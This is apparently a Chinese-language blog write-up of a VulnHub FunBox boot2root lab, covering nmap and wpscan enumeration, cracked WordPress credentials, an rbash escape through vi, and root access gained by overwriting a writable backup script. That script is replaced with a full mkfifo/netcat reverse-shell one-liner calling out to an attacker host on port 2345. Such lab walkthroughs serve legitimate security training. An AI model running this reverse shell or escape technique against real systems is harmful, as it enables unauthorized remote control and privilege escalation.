vulnhub-FunBox-wp

本文详细介绍了一次针对FunBox靶机的渗透测试过程。从信息搜集开始,利用wpscan获取WordPress用户密码,通过ssh连接并利用rbash逃逸技巧获得正常shell权限。随后,通过一系列操作最终实现提权,获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机描述
博客地址 http://blog.yutian233.xyz/

Boot2Root ! This is a reallife szenario, but easy going. You have to enumerate and understand the szenario to get the root-flag in round about 20min.

This VM is created/tested with Virtualbox. Maybe it works with vmware.

If you need hints, call me on twitter: @0815R2d2

Have fun...


This works better with VirtualBox rather than VMware

https://www.vulnhub.com/entry/funbox-1,518/

清单

  • 信息搜集

    • WordPress

    • wpscan 得到密码

  • 提权

    • rbash 逃逸
    • 权限开放的.sh

主机发现

image-20200807133302606

信息搜集

nmap -A -p- 192.168.0.108

image-20200807123240973

网站由Wordpress搭建

扫描用户

wpscan --url http://funbox.fritz.box/ --enumerate u

image-20200807123422804

有两个用户:admin、joe

对用户爆破密码

image-20200807123510940

image-20200807123533190

admin	iubire
joe 1234

joe用户

使用 ssh连接 shell

image-20200807131213316

可以看到是一个受限的shell

逃逸方法

vi
:set shell=/bin/bash
:shell

即可获得正常的shell

image-20200807131348078

来到用户 funny的目录

输入命令

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 2345 >/tmp/f” > .backup.sh

将 .backup.sh的内容覆盖为 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 2345 >/tmp/f

image-20200807131436035

输入之前在kali开启监听端口 2345

等待 5 分钟

获得root

image-20200807131659070

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值